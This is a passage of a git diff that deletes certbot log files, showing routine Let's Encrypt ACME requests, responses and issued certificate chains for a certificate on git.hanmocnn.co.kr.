-DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG -Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u -LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0 -dHA6Ly9lOC5jLmxlbmNyLm9yZy8zNS5jcmwwggEDBgorBgEEAdZ5AgQCBIH0BIHx -AO8AdgBJnJtp3h187Pw23s2HZKa4W68Kh4AZ0VVS++nrKd34wwAAAZxfAKdsAAAE -AwBHMEUCIQDsy9jhLjXeJoQMItYmlsDlg2dPc4bQdwlkxZ83ASW7CgIgDTYtHiyx -Ra5tMOEnPAgL3rgoGxHqUuRhL44mliLadqsAdQAOV5S8866pPjMbLJkHs/eQ35vC -PXEyJd0hqSWsYcVOIQAAAZxfAKd6AAAEAwBGMEQCIGW+1m6yYhpFaSytT2ZcvXan -J70bg4okL9UiIcHsyn5EAiA+214YOe6J72XannRc2zDN0+qcm3JqCKuGuMzyNNac -LjAKBggqhkjOPQQDAwNmADBjAjAaJFlyIY07BWGd19PrzlR9FgOMjfhIcaiK1hb4 -FiCeJ11NYipDkHVMSsWacpb3cBQCL2pPIsXrhVKMMGtgG3N1uJ3t3+XycX0f8uQZ -TqpyEvrK/2BVnebJ42j/TLbZKe2F ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIIEVjCCAj6gAwIBAgIQY5WTY8JOcIJxWRi/w9ftVjANBgkqhkiG9w0BAQsFADBP -MQswCQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFy -Y2ggR3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMTAeFw0yNDAzMTMwMDAwMDBa -Fw0yNzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBF -bmNyeXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7c -S7QMApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHb -R6EToMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB -9TAOBgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMB -MBIGA1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4j -cpHKMB8GA1UdIwQYMBaAFHm0WeZ7tuXkAXOACIjIGlj26ZtuMDIGCCsGAQUFBwEB -BCYwJDAiBggrBgEFBQcwAoYWaHR0cDovL3gxLmkubGVuY3Iub3JnLzATBgNVHSAE -DDAKMAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDEuYy5sZW5j -ci5vcmcvMA0GCSqGSIb3DQEBCwUAA4ICAQBnE0hGINKsCYWi0Xx1ygxD5qihEjZ0 -RI3tTZz1wuATH3ZwYPIp97kWEayanD1j0cDhIYzy4CkDo2jB8D5t0a6zZWzlr98d -AQFNh8uKJkIHdLShy+nUyeZxc5bNeMp1Lu0gSzE4McqfmNMvIpeiwWSYO9w82Ob8 -otvXcO2JUYi3svHIWRm3+707DUbL51XMcY2iZdlCq4Wa9nbuk3WTU4gr6LY8MzVA -aDQG2+4U3eJ6qUF10bBnR1uuVyDYs9RhrwucRVnfuDj29CMLTsplM5f5wSV5hUpm -Uwp/vV7M4w4aGunt74koX71n4EdagCsL/Yk5+mAQU0+tue0JOfAV/R6t1k+Xk9s2 -HMQFeoxppfzAVC04FdG9M+AC2JWxmFSt6BCuh3CEey3fE52Qrj9YM75rtvIjsm/1 -Hl+u//Wqxnu1ZQ4jpa+VpuZiGOlWrqSP9eogdOhCGisnyewWJwRQOqK16wiGyZeR -xs/Bekw65vwSIaVkBruPiTfMOo0Zh4gVa8/qJgMbJbyrwwG97z/PRgmLKCDl8z3d -tA0Z7qq7fta0Gl24uyuB05dqI5J1LvAzKuWdIjT1tP8qCoxSE/xpix8hX2dt3h+/ -jujUgFPFZ0EVZ0xSyBNRF3MboGZnYXFUxpNjTWPKpagDHJQmqrAcDmWJnMsFY3jS -u1igv3OefnWjSQ== ------END CERTIFICATE----- - -2026-02-15 01:53:26,184:DEBUG:acme.client:Storing nonce: qLPTsdtffEZaTjSpANFtAGOp0QEYnQLfiuY8-tbgnSfxKI78uV0 -2026-02-15 01:53:26,185:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:53:26,189:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/1: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZmZFWmFUalNwQU5GdEFHT3AwUUVZblFMZml1WTgtdGJnblNmeEtJNzh1VjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDYzYTJkYTI4YjAwYjJmMjY3YTNjZDE2OTMzN2MwN2FkOWEyLzEifQ", - "signature": "V4Gjh8GxzcOzTh-QYcEuKufBewF8gp3FUxRLWPCMFeDQpFcebcsIliEbqZmzr0BFuMSqVYPYvbWBFs3Dhtf9KwoKR9RQnIVpZd_Adku-kH5-ZETduBxSg8OhPZDnXM7JRo3kFSueQTRhb_wmc8t8myVsTkStPIi9QQ-9KxDK-9eTKq6oddpEwkLtfn-HcNYFGb9rUl4kemxou-p57Q7syOVYFoTxAMgqfWlqoGEkPiOPijvc21QV6heLOFL237APw6mah-TFy__FKWE2qsMnqwUt-j-0zc8jamnjEZkOBWmeLCmSm0VHrlRWH-YnZ7r-f19cfCMpZzPmc-m-gs3aTw", - "payload": "" -} -2026-02-15 01:53:26,380:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/063a2da28b00b2f267a3cd169337c07ad9a2/1 HTTP/1.1" 200 2320 -2026-02-15 01:53:26,381:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:53:26 GMT -Content-Type: application/pem-certificate-chain -Content-Length: 2320 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="alternate" -Replay-Nonce: qLPTsdtfwSYsFE7-JIK1dHgMxweu1kVeaqKyz4OjYM0Ebu0SZ2Q -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - ------BEGIN CERTIFICATE----- -MIIDoTCCAymgAwIBAgISBjotoosAsvJno80WkzfAetmiMAoGCCqGSM49BAMDMDIx -CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF -ODAeFw0yNjAyMTUwMDU0NTRaFw0yNjA1MTYwMDU0NTNaMB0xGzAZBgNVBAMTEmdp -dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABO2QHGp6d0JT -Hp2JZx0w+8v2jDULGD0Svxj22Odn6iiU7gxE2YroyYltqLl29+johBznqogYdAnh -AWrNQvuhXrZTWz/XhGRXluBAMlCaUsmPH81K289fu+BsvzTtcwgknqOCAhUwggIR -MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E -AjAAMB0GA1UdDgQWBBQjXg5iaIl+VaOsKFNBDYMgWCIYbDAfBgNVHSMEGDAWgBSP -DROi9i5+0VBsMxg4XVmOI3KRyjAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG -Fmh0dHA6Ly9lOC5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u -LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0 -dHA6Ly9lOC5jLmxlbmNyLm9yZy8zNS5jcmwwggEDBgorBgEEAdZ5AgQCBIH0BIHx -AO8AdgBJnJtp3h187Pw23s2HZKa4W68Kh4AZ0VVS++nrKd34wwAAAZxfAKdsAAAE -AwBHMEUCIQDsy9jhLjXeJoQMItYmlsDlg2dPc4bQdwlkxZ83ASW7CgIgDTYtHiyx -Ra5tMOEnPAgL3rgoGxHqUuRhL44mliLadqsAdQAOV5S8866pPjMbLJkHs/eQ35vC -PXEyJd0hqSWsYcVOIQAAAZxfAKd6AAAEAwBGMEQCIGW+1m6yYhpFaSytT2ZcvXan -J70bg4okL9UiIcHsyn5EAiA+214YOe6J72XannRc2zDN0+qcm3JqCKuGuMzyNNac -LjAKBggqhkjOPQQDAwNmADBjAjAaJFlyIY07BWGd19PrzlR9FgOMjfhIcaiK1hb4 -FiCeJ11NYipDkHVMSsWacpb3cBQCL2pPIsXrhVKMMGtgG3N1uJ3t3+XycX0f8uQZ -TqpyEvrK/2BVnebJ42j/TLbZKe2F ------END CERTIFICATE----- - ------BEGIN CERTIFICATE----- -MIICtTCCAjugAwIBAgIQfo8UX4exWTMtf9QIK4JraTAKBggqhkjOPQQDAzBPMQsw -CQYDVQQGEwJVUzEpMCcGA1UEChMgSW50ZXJuZXQgU2VjdXJpdHkgUmVzZWFyY2gg -R3JvdXAxFTATBgNVBAMTDElTUkcgUm9vdCBYMjAeFw0yNDAzMTMwMDAwMDBaFw0y -NzAzMTIyMzU5NTlaMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNy -eXB0MQswCQYDVQQDEwJFODB2MBAGByqGSM49AgEGBSuBBAAiA2IABNFl8l7cS7QM -ApzSsvru6WyrOq44ofTUOTIzxULUzDMMNMchIJBwXOhiLxxxs0LXeb5GDcHbR6ET -oMffgSZjO9SNHfY9gjMy9vQr5/WWOrQTZxh7az6NSNnq3u2ubT6HTKOB+DCB9TAO -BgNVHQ8BAf8EBAMCAYYwHQYDVR0lBBYwFAYIKwYBBQUHAwIGCCsGAQUFBwMBMBIG -A1UdEwEB/wQIMAYBAf8CAQAwHQYDVR0OBBYEFI8NE6L2Ln7RUGwzGDhdWY4jcpHK -MB8GA1UdIwQYMBaAFHxClq7eS0g7+pL4nozPbYupcjeVMDIGCCsGAQUFBwEBBCYw -JDAiBggrBgEFBQcwAoYWaHR0cDovL3gyLmkubGVuY3Iub3JnLzATBgNVHSAEDDAK -MAgGBmeBDAECATAnBgNVHR8EIDAeMBygGqAYhhZodHRwOi8veDIuYy5sZW5jci5v -cmcvMAoGCCqGSM49BAMDA2gAMGUCMQClsUNJdX36GE+o2yDf7L02m3P3ElVWRLls -5ZyLYPjcNamBxRB9gZYoj24mGZtP3GkCMASZcALg6kpScomqIIjVHXRUQ500cdl4 -4n7fhxwokLo/lVlO8YyHwAi7ejTHtvw9Vg== ------END CERTIFICATE----- - -2026-02-15 01:53:26,381:DEBUG:acme.client:Storing nonce: qLPTsdtfwSYsFE7-JIK1dHgMxweu1kVeaqKyz4OjYM0Ebu0SZ2Q -2026-02-15 01:53:26,383:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager -2026-02-15 01:53:26,383:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-7. -2026-02-15 01:53:26,383:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-7. -2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-7/cert.pem. -2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-7/privkey.pem. -2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-7/chain.pem. -2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-7/fullchain.pem. -2026-02-15 01:53:26,384:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-7/README. -2026-02-15 01:53:26,395:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user). -2026-02-15 01:53:26,395:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user). -2026-02-15 01:53:26,395:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user). -2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user). -2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user). -2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user). -2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user). -2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user). -2026-02-15 01:53:26,396:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-15 01:53:26,396:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). -2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user). -2026-02-15 01:53:26,396:DEBUG:certbot.configuration:Var webroot_map={'webroot_path'} (set by user). -2026-02-15 01:53:26,398:DEBUG:certbot._internal.display.obj:Notifying user: -Successfully received certificate. -Certificate is saved at: /etc/letsencrypt/live/npm-7/fullchain.pem -Key is saved at: /etc/letsencrypt/live/npm-7/privkey.pem -This certificate expires on 2026-05-16. -These files will be updated when the certificate renews. -2026-02-15 01:53:26,399:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS: -2026-02-15 01:53:26,399:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions. -2026-02-15 01:53:26,402:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by: - * Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate - * Donating to EFF: https://eff.org/donate-le diff --git a/npm/data/logs/letsencrypt.log.1 b/npm/data/logs/letsencrypt.log.1 deleted file mode 100644 index 847bf66..0000000 --- a/npm/data/logs/letsencrypt.log.1 +++ /dev/null @@ -1,608 +0,0 @@ -2026-02-15 01:51:49,888:DEBUG:certbot._internal.main:certbot version: 5.3.0 -2026-02-15 01:51:49,889:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot -2026-02-15 01:51:49,889:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-6', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'git.hanmocnn.co.kr'] -2026-02-15 01:51:49,889:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot) -2026-02-15 01:51:49,906:DEBUG:certbot._internal.log:Root logging level set at 30 -2026-02-15 01:51:49,907:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None -2026-02-15 01:51:49,907:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot -Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported). -Interfaces: Authenticator, Plugin -Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins') -Initialized: -Prep: True -2026-02-15 01:51:49,908:DEBUG:certbot._internal.plugins.selection:Selected authenticator and installer None -2026-02-15 01:51:49,908:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None -2026-02-15 01:51:50,141:DEBUG:certbot._internal.main:Picked account: -2026-02-15 01:51:50,142:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory. -2026-02-15 01:51:50,147:DEBUG:urllib3.connectionpool:Starting new HTTPS connection (1): acme-v02.api.letsencrypt.org:443 -2026-02-15 01:51:50,678:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "GET /directory HTTP/1.1" 200 1033 -2026-02-15 01:51:50,679:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:51:50 GMT -Content-Type: application/json -Content-Length: 1033 -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "H0mgb220UuM": "https://community.letsencrypt.org/t/adding-random-entries-to-the-directory/33417", - "keyChange": "https://acme-v02.api.letsencrypt.org/acme/key-change", - "meta": { - "caaIdentities": [ - "letsencrypt.org" - ], - "profiles": { - "classic": "https://letsencrypt.org/docs/profiles#classic", - "shortlived": "https://letsencrypt.org/docs/profiles#shortlived", - "tlsclient": "https://letsencrypt.org/docs/profiles#tlsclient", - "tlsserver": "https://letsencrypt.org/docs/profiles#tlsserver" - }, - "termsOfService": "https://letsencrypt.org/documents/LE-SA-v1.6-August-18-2025.pdf", - "website": "https://letsencrypt.org" - }, - "newAccount": "https://acme-v02.api.letsencrypt.org/acme/new-acct", - "newNonce": "https://acme-v02.api.letsencrypt.org/acme/new-nonce", - "newOrder": "https://acme-v02.api.letsencrypt.org/acme/new-order", - "renewalInfo": "https://acme-v02.api.letsencrypt.org/acme/renewal-info", - "revokeCert": "https://acme-v02.api.letsencrypt.org/acme/revoke-cert" -} -2026-02-15 01:51:50,680:DEBUG:certbot._internal.display.obj:Notifying user: Requesting a certificate for git.hanmocnn.co.kr -2026-02-15 01:51:50,687:DEBUG:acme.client:Requesting fresh nonce -2026-02-15 01:51:50,687:DEBUG:acme.client:Sending HEAD request to https://acme-v02.api.letsencrypt.org/acme/new-nonce. -2026-02-15 01:51:50,843:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "HEAD /acme/new-nonce HTTP/1.1" 200 0 -2026-02-15 01:51:50,844:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:51:50 GMT -Connection: keep-alive -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: NeKnt8TGdBzHxUclyNbZW9s3_Zgksoml2Lq4pfk94QLSB9SdukQ -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - - -2026-02-15 01:51:50,844:DEBUG:acme.client:Storing nonce: NeKnt8TGdBzHxUclyNbZW9s3_Zgksoml2Lq4pfk94QLSB9SdukQ -2026-02-15 01:51:50,844:DEBUG:acme.client:JWS payload: -b'{\n "identifiers": [\n {\n "type": "dns",\n "value": "git.hanmocnn.co.kr"\n }\n ]\n}' -2026-02-15 01:51:50,850:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/new-order: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2RCekh4VWNseU5iWlc5czNfWmdrc29tbDJMcTRwZms5NFFMU0I5U2R1a1EiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL25ldy1vcmRlciJ9", - "signature": "qAt8eXKNxxIDV6XMGdk18fBntRW7vcOUV0PZTTDSghKJeeenaQzg4Qz1BDHYaPfkAmEZ6z-TtzeTZvewo3COOxe6qqUOeSOKsWs2GP6SIBSqWoGem8DFRpqk3FVk0vmXIoiupF3plySfrpK5C0gbOGya5OtDDC3nY1UYnFC9aYefhHWqUL61zmQHSA_XCukwwgPP8PgOQ3Cbyi7KSaLAVjp27VKmxGCt6IqmlkZi1VpT8nxXfYpMwQ-VQKDwnSgG7FtjwgSZnJCd2IIJnM3kkaIv-FO51nivhU1pUcxXvk_pnZtLv86_O65fmTLhFlTASOKiaDnoffI-FhZE0KOTvg", - "payload": "ewogICJpZGVudGlmaWVycyI6IFsKICAgIHsKICAgICAgInR5cGUiOiAiZG5zIiwKICAgICAgInZhbHVlIjogImdpdC5oYW5tb2Nubi5jby5rciIKICAgIH0KICBdCn0" -} -2026-02-15 01:51:51,040:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/new-order HTTP/1.1" 201 352 -2026-02-15 01:51:51,040:DEBUG:acme.client:Received response: -HTTP 201 -Server: nginx -Date: Sun, 15 Feb 2026 01:51:50 GMT -Content-Type: application/json -Content-Length: 352 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986 -Replay-Nonce: NeKnt8TGHmpTiA8eUyeODagzdJZLQFsIFH4bWqSCTp34fwUNaU4 -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "status": "pending", - "expires": "2026-02-22T01:51:50Z", - "identifiers": [ - { - "type": "dns", - "value": "git.hanmocnn.co.kr" - } - ], - "authorizations": [ - "https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036" - ], - "finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986" -} -2026-02-15 01:51:51,040:DEBUG:acme.client:Storing nonce: NeKnt8TGHmpTiA8eUyeODagzdJZLQFsIFH4bWqSCTp34fwUNaU4 -2026-02-15 01:51:51,041:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:51:51,045:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR0htcFRpQThlVXllT0RhZ3pkSlpMUUZzSUZINGJXcVNDVHAzNGZ3VU5hVTQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2In0", - "signature": "xD5_zw4XMvY1xlo89Kw8bnTshAIEzOReJhnmZtVJoDWODLY0tZyeNLnS5As4aNG3urUYk_2V-DdHxWa3KVqNnUoWiU3zEk4NYrAfc12VEIdJpn3XhrTtgrM7t1qhXO8RjIt_9QwR1jjmp7moDIIFHsUw-pDmzGGQTh619IhVl7aPb--Szq0F-EmOD1r1T9bD3YgrKLSw47qPwytNmwnshzT8p-c9oGrU577S5DN2Wqorzbx0BSW_--DAoc2kVkdkrKs-nNrfSaY07bxQGDQXQNnSdYgyiIJKu1F-wB22KUBes5ms6o8k1FqOLXyNgymzjUcuZ0hfYe3sZ6E4TlHrWQ", - "payload": "" -} -2026-02-15 01:51:51,203:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658839462036 HTTP/1.1" 200 826 -2026-02-15 01:51:51,204:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:51:51 GMT -Content-Type: application/json -Content-Length: 826 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index" -Replay-Nonce: 4AH-2vvBn0w9qfwZhLqSAyLL6pOKIlFnF7FvghSQeN3TK7jb0WM -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "identifier": { - "type": "dns", - "value": "git.hanmocnn.co.kr" - }, - "status": "pending", - "expires": "2026-02-22T01:51:50Z", - "challenges": [ - { - "type": "tls-alpn-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" - }, - { - "type": "dns-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/muacBg", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" - }, - { - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" - } - ] -} -2026-02-15 01:51:51,204:DEBUG:acme.client:Storing nonce: 4AH-2vvBn0w9qfwZhLqSAyLL6pOKIlFnF7FvghSQeN3TK7jb0WM -2026-02-15 01:51:51,205:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/wUR-nQ', 'status': 'pending', 'token': 'lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0'} -2026-02-15 01:51:51,205:INFO:certbot._internal.auth_handler:Performing the following challenges: -2026-02-15 01:51:51,205:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='git.hanmocnn.co.kr') -2026-02-15 01:51:51,206:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains. -2026-02-15 01:51:51,206:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge -2026-02-15 01:51:51,207:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0 -2026-02-15 01:51:51,208:DEBUG:acme.client:JWS payload: -b'{}' -2026-02-15 01:51:51,212:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ: -{ - "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2Qm4wdzlxZndaaExxU0F5TEw2cE9LSWxGbkY3RnZnaFNRZU4zVEs3amIwV00iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4ODM5NDYyMDM2L1dCY1lSUSJ9", - "signature": "NBWiYVLMnqzqVjVd9e2EOtYQIaoXr58024Qvuw6w-bluVIrcYqsRzjqIYI6xMcmuOAArmP0ARse7Fe7Nfdv0y6XvMQqhZyX3ttOp3LzCKLKARrz0ze-VI6Qit6OhFHUb-4M8ly-bU50uETtv-suWUD2N7mzTPHgJYsV4bCnNw-06YfRev5KGyu-pkZnXb_5BkbvAVqLCWGZpHLZ9P2maQSK38isRzRRvg_Yph53XTkm7_Apt48RvyciOSvRpxT0y4GitmuL_S6kqaiJUJnsQXAi8iZT6AlNd4JfWgy-IKNd-pLeJML9Jp5Ml6VMEY8cjpGbC4rvRAEO4ghJ_gMNV2A", - "payload": "e30" -} -2026-02-15 01:51:51,374:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658839462036/WBcYRQ HTTP/1.1" 200 195 -2026-02-15 01:51:51,375:DEBUG:acme.client:Received response: -HTTP 200 -Server: nginx -Date: Sun, 15 Feb 2026 01:51:51 GMT -Content-Type: application/json -Content-Length: 195 -Connection: keep-alive -Boulder-Requester: 3064386906 -Cache-Control: public, max-age=0, no-cache -Link: ;rel="index", ;rel="up" -Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ -Replay-Nonce: NeKnt8TGCVoX15XqxHcH8EwLY7mU0fhc5iu-W8E95dWPI9_TGIQ -X-Frame-Options: DENY -Strict-Transport-Security: max-age=604800 - -{ - "type": "http-01", - "url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658839462036/WBcYRQ", - "status": "pending", - "token": "lYADYtOgtUUXj8WVH2qa0AW6RT8-qr577RV-yS7nYY0" -} -2026-02-15 01:51:51,375:DEBUG:acme.client:Storing nonce: NeKnt8TGCVoX15XqxHcH8EwLY7mU0fhc5iu-W8E95dWPI9_TGIQ -2026-02-15 01:51:51,376:INFO:certbot._internal.auth_handler:Waiting for verification... -2026-02-15 01:51:52,376:DEBUG:acme.client:JWS payload: -b'' -2026-02-15 01:51:52,381:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036: -{ - "protected": 